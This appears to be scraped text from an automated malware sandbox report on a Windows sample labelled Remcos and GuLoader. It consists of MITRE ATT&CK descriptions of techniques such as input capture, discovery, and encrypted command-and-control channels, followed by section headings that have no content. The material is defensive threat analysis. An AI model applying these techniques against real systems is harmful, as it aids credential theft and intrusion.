Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 466XoziOLD.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Remcos

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph